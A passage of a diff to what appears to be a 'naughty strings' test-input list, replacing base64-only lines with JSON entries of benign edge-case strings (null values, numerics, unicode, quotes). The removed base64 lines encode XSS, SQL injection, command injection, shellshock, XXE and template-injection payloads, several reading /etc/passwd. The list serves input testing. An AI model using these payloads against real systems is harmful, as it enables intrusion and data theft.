-  "PGkgb253aGVlbD1hbGVydCgxKT4gU2Nyb2xsIG92ZXIgbWUgPC9pPg==", 
-  "PHBsYWludGV4dD4=", 
-  "aHR0cDovL2EvJSUzMCUzMA==", 
-  "PC90ZXh0YXJlYT48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4=", 
-  "MTtEUk9QIFRBQkxFIHVzZXJz", 
-  "MSc7IERST1AgVEFCTEUgdXNlcnMtLSAx", 
-  "JyBPUiAxPTEgLS0gMQ==", 
-  "JyBPUiAnMSc9JzE=", 
-  "JQ==", 
-  "Xw==", 
-  "LQ==", 
-  "LS0=", 
-  "LS12ZXJzaW9u", 
-  "LS1oZWxw", 
-  "JFVTRVI=", 
-  "L2Rldi9udWxsOyB0b3VjaCAvdG1wL2JsbnMuZmFpbCA7IGVjaG8=", 
-  "YHRvdWNoIC90bXAvYmxucy5mYWlsYA==", 
-  "JCh0b3VjaCAvdG1wL2JsbnMuZmFpbCk=", 
-  "QHtbc3lzdGVtICJ0b3VjaCAvdG1wL2JsbnMuZmFpbCJdfQ==", 
-  "ZXZhbCgicHV0cyAnaGVsbG8gd29ybGQnIik=", 
-  "U3lzdGVtKCJscyAtYWwgLyIp", 
-  "YGxzIC1hbCAvYA==", 
-  "S2VybmVsLmV4ZWMoImxzIC1hbCAvIik=", 
-  "S2VybmVsLmV4aXQoMSk=", 
-  "JXgoJ2xzIC1hbCAvJyk=", 
-  "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28g", 
-  "WyA8IUVMRU1FTlQgZm9vIEFOWSA+PCFFTlRJVFkgeHhlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFz", 
-  "c3dkIiA+XT48Zm9vPiZ4eGU7PC9mb28+", 
-  "JEhPTUU=", 
-  "JEVOVnsnSE9NRSd9", 
-  "JWQ=", 
-  "JXM=", 
-  "ezB9", 
-  "JSouKnM=", 
-  "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==", 
-  "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2hvc3Rz", 
-  "KCkgeyAwOyB9OyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazEuZmFpbDs=", 
-  "KCkgeyBfOyB9ID5fWyQoJCgpKV0geyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazIuZmFpbDsg", 
-  "fQ==", 
-  "PDw8ICVzKHVuPSclcycpID0gJXU=", 
-  "KysrQVRIMA==", 
-  "Q09O", 
-  "UFJO", 
-  "QVVY", 
-  "Q0xPQ0sk", 
-  "TlVM", 
-  "QTo=", 
-  "Wlo6", 
-  "Q09NMQ==", 
-  "TFBUMQ==", 
-  "TFBUMg==", 
-  "TFBUMw==", 
-  "Q09NMg==", 
-  "Q09NMw==", 
-  "Q09NNA==", 
-  "RENDIFNFTkQgU1RBUlRLRVlMT0dHRVIgMCAwIDA=", 
-  "U2N1bnRob3JwZSBHZW5lcmFsIEhvc3BpdGFs", 
-  "UGVuaXN0b25lIENvbW11bml0eSBDaHVyY2g=", 
-  "TGlnaHR3YXRlciBDb3VudHJ5IFBhcms=", 
-  "SmltbXkgQ2xpdGhlcm9l", 
-  "SG9ybmltYW4gTXVzZXVt", 
-  "c2hpdGFrZSBtdXNocm9vbXM=", 
-  "Um9tYW5zSW5TdXNzZXguY28udWs=", 
-  "aHR0cDovL3d3dy5jdW0ucWMuY2Ev", 
-  "Q3JhaWcgQ29ja2J1cm4sIFNvZnR3YXJlIFNwZWNpYWxpc3Q=", 
-  "TGluZGEgQ2FsbGFoYW4=", 
-  "RHIuIEhlcm1hbiBJLiBMaWJzaGl0eg==", 
-  "bWFnbmEgY3VtIGxhdWRl", 
-  "U3VwZXIgQm93bCBYWFg=", 
-  "bWVkaWV2YWwgZXJlY3Rpb24gb2YgcGFyYXBldHM=", 
-  "ZXZhbHVhdGU=", 
-  "bW9jaGE=", 
-  "ZXhwcmVzc2lvbg==", 
-  "QXJzZW5hbCBjYW5hbA==", 
-  "Y2xhc3NpYw==", 
-  "VHlzb24gR2F5", 
-  "RGljayBWYW4gRHlrZQ==", 
-  "YmFzZW1lbnQ=", 
-  "SWYgeW91J3JlIHJlYWRpbmcgdGhpcywgeW91J3ZlIGJlZW4gaW4gYSBjb21hIGZvciBhbG1vc3Qg", 
-  "MjAgeWVhcnMgbm93LiBXZSdyZSB0cnlpbmcgYSBuZXcgdGVjaG5pcXVlLiBXZSBkb24ndCBrbm93", 
-  "IHdoZXJlIHRoaXMgbWVzc2FnZSB3aWxsIGVuZCB1cCBpbiB5b3VyIGRyZWFtLCBidXQgd2UgaG9w", 
-  "ZSBpdCB3b3Jrcy4gUGxlYXNlIHdha2UgdXAsIHdlIG1pc3MgeW91Lg==", 
-  "Um9zZXMgYXJlIBtbMDszMW1yZWQbWzBtLCB2aW9sZXRzIGFyZSAbWzA7MzRtYmx1ZS4gSG9wZSB5", 
-  "b3UgZW5qb3kgdGVybWluYWwgaHVl", 
-  "QnV0IG5vdy4uLhtbMjBDZm9yIG15IGdyZWF0ZXN0IHRyaWNrLi4uG1s4bQ==", 
-  "VGhlIHF1aWMICAgICAhrIGJyb3duIGZvBwcHBwcHBwcHBwd4Li4uIFtCZWVlZXBd", 
-  "UG93ZXLZhNmP2YTZj9i12ZHYqNmP2YTZj9mE2LXZkdio2Y/Ysdix2Ysg4KWjIOClo2gg4KWjIOCl", 
-  "o+WGlw==", 
-  "2q/ahtm+2pg=",
-  "eyUgcHJpbnQgJ3gnICogNjQgKiAxMDI0KiozICV9",
-  "e3sgIiIuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFz",
-  "c3dkIikucmVhZCgpIH19"
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "undefined",
+    "base64": "dW5kZWZpbmVk"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "undef",
+    "base64": "dW5kZWY="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "null",
+    "base64": "bnVsbA=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "NULL",
+    "base64": "TlVMTA=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "(null)",
+    "base64": "KG51bGwp"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "nil",
+    "base64": "bmls"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "NIL",
+    "base64": "TklM"
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "true",
+    "base64": "dHJ1ZQ=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "false",
+    "base64": "ZmFsc2U="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "True",
+    "base64": "VHJ1ZQ=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "False",
+    "base64": "RmFsc2U="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "TRUE",
+    "base64": "VFJVRQ=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "FALSE",
+    "base64": "RkFMU0U="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "None",
+    "base64": "Tm9uZQ=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "hasOwnProperty",
+    "base64": "aGFzT3duUHJvcGVydHk="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "then",
+    "base64": "dGhlbg=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "constructor",
+    "base64": "Y29uc3RydWN0b3I="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "\\",
+    "base64": "XA=="
+  },
+  {
+    "category": "Strings which may be used elsewhere in code",
+    "string": "\\\\",
+    "base64": "XFw="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0",
+    "base64": "MA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1",
+    "base64": "MQ=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.00",
+    "base64": "MS4wMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "$1.00",
+    "base64": "JDEuMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1/2",
+    "base64": "MS8y"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1E2",
+    "base64": "MUUy"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1E02",
+    "base64": "MUUwMg=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1E+02",
+    "base64": "MUUrMDI="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1",
+    "base64": "LTE="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1.00",
+    "base64": "LTEuMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-$1.00",
+    "base64": "LSQxLjAw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1/2",
+    "base64": "LTEvMg=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1E2",
+    "base64": "LTFFMg=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1E02",
+    "base64": "LTFFMDI="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1E+02",
+    "base64": "LTFFKzAy"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1/0",
+    "base64": "MS8w"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0/0",
+    "base64": "MC8w"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-2147483648/-1",
+    "base64": "LTIxNDc0ODM2NDgvLTE="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-9223372036854775808/-1",
+    "base64": "LTkyMjMzNzIwMzY4NTQ3NzU4MDgvLTE="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-0",
+    "base64": "LTA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-0.0",
+    "base64": "LTAuMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "+0",
+    "base64": "KzA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "+0.0",
+    "base64": "KzAuMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.00",
+    "base64": "MC4wMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0..0",
+    "base64": "MC4uMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": ".",
+    "base64": "Lg=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.0.0",
+    "base64": "MC4wLjA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,00",
+    "base64": "MCwwMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,,0",
+    "base64": "MCwsMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": ",",
+    "base64": "LA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,0,0",
+    "base64": "MCwwLDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.0/0",
+    "base64": "MC4wLzA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.0/0.0",
+    "base64": "MS4wLzAuMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0.0/0.0",
+    "base64": "MC4wLzAuMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1,0/0,0",
+    "base64": "MSwwLzAsMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0,0/0,0",
+    "base64": "MCwwLzAsMA=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "--1",
+    "base64": "LS0x"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-",
+    "base64": "LQ=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-.",
+    "base64": "LS4="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-,",
+    "base64": "LSw="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999",
+    "base64": "OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "NaN",
+    "base64": "TmFO"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "Infinity",
+    "base64": "SW5maW5pdHk="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-Infinity",
+    "base64": "LUluZmluaXR5"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "INF",
+    "base64": "SU5G"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#INF",
+    "base64": "MSNJTkY="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "-1#IND",
+    "base64": "LTEjSU5E"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#QNAN",
+    "base64": "MSNRTkFO"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#SNAN",
+    "base64": "MSNTTkFO"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1#IND",
+    "base64": "MSNJTkQ="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0x0",
+    "base64": "MHgw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0xffffffff",
+    "base64": "MHhmZmZmZmZmZg=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0xffffffffffffffff",
+    "base64": "MHhmZmZmZmZmZmZmZmZmZmZm"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "0xabad1dea",
+    "base64": "MHhhYmFkMWRlYQ=="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "123456789012345678901234567890123456789",
+    "base64": "MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1,000.00",
+    "base64": "MSwwMDAuMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000.00",
+    "base64": "MSAwMDAuMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000.00",
+    "base64": "MScwMDAuMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1,000,000.00",
+    "base64": "MSwwMDAsMDAwLjAw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000 000.00",
+    "base64": "MSAwMDAgMDAwLjAw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000'000.00",
+    "base64": "MScwMDAnMDAwLjAw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.000,00",
+    "base64": "MS4wMDAsMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000,00",
+    "base64": "MSAwMDAsMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000,00",
+    "base64": "MScwMDAsMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1.000.000,00",
+    "base64": "MS4wMDAuMDAwLDAw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1 000 000,00",
+    "base64": "MSAwMDAgMDAwLDAw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "1'000'000,00",
+    "base64": "MScwMDAnMDAwLDAw"
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "01000",
+    "base64": "MDEwMDA="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "08",
+    "base64": "MDg="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "09",
+    "base64": "MDk="
+  },
+  {
+    "category": "Strings which can be interpreted as numeric",
+    "string": "2.2250738585072011e-308",
+    "base64": "Mi4yMjUwNzM4NTg1MDcyMDExZS0zMDg="
+  },
+  {
+    "category": "contexts.  Divided into three groups based on (US-layout) keyboard position.",
+    "string": ",./;'[]\\-=",
+    "base64": "LC4vOydbXVwtPQ=="
+  },
+  {
+    "category": "contexts.  Divided into three groups based on (US-layout) keyboard position.",
+    "string": "<>?:\"{}|_+",
+    "base64": "PD4/OiJ7fXxfKw=="
+  },
+  {
+    "category": "contexts.  Divided into three groups based on (US-layout) keyboard position.",
+    "string": "!@#$%^&*()`~",
+    "base64": "IUAjJCVeJiooKWB+"
+  },
+  {
+    "category": "The next line may appear to be blank or mojibake in some viewers.",
+    "string": "\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f",
+    "base64": "AQIDBAUGBwgODxAREhMUFRYXGBkaGxwdHh9/"
+  },
+  {
+    "category": "The next line may appear to be blank, mojibake, or dingbats in some viewers.",
+    "string": "",
+    "base64": "woDCgcKCwoPChMKGwofCiMKJworCi8KMwo3CjsKPwpDCkcKSwpPClMKVwpbCl8KYwpnCmsKbwpzCncKewp8="
+  },
+  {
+    "category": "The next line may be flagged for \"trailing whitespace\" in some viewers.",
+    "string": "​",
+    "base64": "4oCL"
+  },
+  {
+    "category": "The next line may appear to be blank or mojibake in some viewers.",
+    "string": "­؀؁؂؃؄؅؜۝܏᠎​‌‍‎‏‪‫‬‭‮⁠⁡⁢⁣⁤⁦⁧⁨⁩⁪⁫⁬⁭⁮⁯﻿￹￺￻𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿",
+    "base64": "wq3YgNiB2ILYg9iE2IXYnNud3I/hoI7igIvigIzigI3igI7igI/igKrigKvigKzigK3igK7igaDigaHigaLigaPigaTigabigafigajiganigarigavigaziga3iga7iga/vu7/vv7nvv7rvv7vwkYK98JuyoPCbsqHwm7Ki8Juyo/CdhbPwnYW08J2FtfCdhbbwnYW38J2FuPCdhbnwnYW686CAgfOggKDzoICh86CAovOggKPzoICk86CApfOggKbzoICn86CAqPOggKnzoICq86CAq/OggKzzoICt86CArvOggK/zoICw86CAsfOggLLzoICz86CAtPOggLXzoIC286CAt/OggLjzoIC586CAuvOggLvzoIC886CAvfOggL7zoIC/86CBgPOggYHzoIGC86CBg/OggYTzoIGF86CBhvOggYfzoIGI86CBifOggYrzoIGL86CBjPOggY3zoIGO86CBj/OggZDzoIGR86CBkvOggZPzoIGU86CBlfOggZbzoIGX86CBmPOggZnzoIGa86CBm/OggZzzoIGd86CBnvOggZ/zoIGg86CBofOggaLzoIGj86CBpPOggaXzoIGm86CBp/OggajzoIGp86CBqvOggavzoIGs86CBrfOgga7zoIGv86CBsPOggbHzoIGy86CBs/OggbTzoIG186CBtvOggbfzoIG486CBufOggbrzoIG786CBvPOggb3zoIG+86CBvw=="
+  },
+  {
+    "category": "The next two lines may appear to be blank or mojibake in some viewers.",
+    "string": "﻿",
+    "base64": "77u/"
+  },
+  {
+    "category": "The next two lines may appear to be blank or mojibake in some viewers.",
+    "string": "￾",
+    "base64": "77++"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "Ω≈ç√∫˜µ≤≥÷",
+    "base64": "zqniiYjDp+KImuKIq8ucwrXiiaTiiaXDtw=="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "åß∂ƒ©˙∆˚¬…æ",
+    "base64": "w6XDn+KIgsaSwqnLmeKIhsuawqzigKbDpg=="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "œ∑´®†¥¨ˆøπ“‘",
+    "base64": "xZPiiJHCtMKu4oCgwqXCqMuGw7jPgOKAnOKAmA=="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "¡™£¢∞§¶•ªº–≠",
+    "base64": "wqHihKLCo8Ki4oiewqfCtuKAosKqwrrigJPiiaA="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "¸˛Ç◊ı˜Â¯˘¿",
+    "base64": "wrjLm8OH4peKxLHLnMOCwq/LmMK/"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "ÅÍÎÏ˝ÓÔÒÚÆ☃",
+    "base64": "w4XDjcOOw4/LncOTw5Tvo7/DksOaw4bimIM="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "Œ„´‰ˇÁ¨ˆØ∏”’",
+    "base64": "xZLigJ7CtOKAsMuHw4HCqMuGw5jiiI/igJ3igJk="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "`⁄€‹›ﬁﬂ‡°·‚—±",
+    "base64": "YOKBhOKCrOKAueKAuu+sge+sguKAocKwwrfigJrigJTCsQ=="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "⅛⅜⅝⅞",
+    "base64": "4oWb4oWc4oWd4oWe"
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя",
+    "base64": "0IHQgtCD0ITQhdCG0IfQiNCJ0IrQi9CM0I3QjtCP0JDQkdCS0JPQlNCV0JbQl9CY0JnQmtCb0JzQndCe0J/QoNCh0KLQo9Ck0KXQptCn0KjQqdCq0KvQrNCt0K7Qr9Cw0LHQstCz0LTQtdC20LfQuNC50LrQu9C80L3QvtC/0YDRgdGC0YPRhNGF0YbRh9GI0YnRitGL0YzRjdGO0Y8="
+  },
+  {
+    "category": "Strings which contain common unicode symbols (e.g. smart quotes)",
+    "string": "٠١٢٣٤٥٦٧٨٩",
+    "base64": "2aDZodmi2aPZpNml2abZp9mo2ak="
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "⁰⁴⁵",
+    "base64": "4oGw4oG04oG1"
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "₀₁₂",
+    "base64": "4oKA4oKB4oKC"
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "⁰⁴⁵₀₁₂",
+    "base64": "4oGw4oG04oG14oKA4oKB4oKC"
+  },
+  {
+    "category": "Strings which contain unicode subscripts/superscripts; can cause rendering issues",
+    "string": "ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็",
+    "base64": "4LiU4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmH4LmH4LmJ4LmJ4LmJ4LmJ4LmJ4LmH4LmH4LmH4LmHIOC4lOC5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5h+C5h+C5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5h+C5h+C5ieC5ieC5ieC5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5h+C5h+C5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5h+C5h+C5ieC5ieC5ieC5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5h+C5h+C5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5h+C5h+C5ieC5ieC5ieC5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5h+C5h+C5ieC5ieC5ieC5ieC5ieC5h+C5h+C5h+C5hyDguJTguYnguYnguYnguYnguYnguYfguYfguYfguYfguYfguYnguYnguYnguYnguYnguYfguYfguYfguYfguYfguYnguYnguYnguYnguYnguYnguYnguYnguYfguYfguYfguYfguYfguYnguYnguYnguYnguYnguYfguYfguYfguYfguYfguYnguYnguYnguYnguYnguYnguYnguYnguYfguYfguYfguYfguYfguYnguYnguYnguYnguYnguYfguYfguYfguYfguYfguYnguYnguYnguYnguYnguYnguYnguYnguYfguYfguYfguYfguYfguYnguYnguYnguYnguYnguYfguYfguYfguYc="
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "'",
+    "base64": "Jw=="
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\"",
+    "base64": "Ig=="
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "''",
+    "base64": "Jyc="
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\"\"",
+    "base64": "IiI="
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "'\"'",
+    "base64": "JyIn"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\"''''\"'\"",
+    "base64": "IicnJyciJyI="
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "\"'\"'\"''''\"",
+    "base64": "IiciJyInJycnIg=="
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=“bar” />",
+    "base64": "PGZvbyB2YWw94oCcYmFy4oCdIC8+"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=“bar” />",
+    "base64": "PGZvbyB2YWw94oCcYmFy4oCdIC8+"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=”bar“ />",
+    "base64": "PGZvbyB2YWw94oCdYmFy4oCcIC8+"
+  },
+  {
+    "category": "Strings which contain misplaced quotation marks; can cause encoding errors",
+    "string": "<foo val=`bar' />",
+    "base64": "PGZvbyB2YWw9YGJhcicgLz4="
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "田中さんにあげて下さい",
+    "base64": "55Sw5Lit44GV44KT44Gr44GC44GS44Gm5LiL44GV44GE"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "パーティーへ行かないか",
+    "base64": "44OR44O844OG44Kj44O844G46KGM44GL44Gq44GE44GL"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "和製漢語",
+    "base64": "5ZKM6KO95ryi6Kqe"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "部落格",
+    "base64": "6YOo6JC95qC8"
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
+    "string": "사회과학원 어학연구소",
+    "base64": "7IKs7ZqM6rO87ZWZ7JuQIOyWtO2VmeyXsOq1rOyGjA=="
+  },
+  {
+    "category": "Strings which contain two-byte characters: can cause rendering issues or character-length issues",
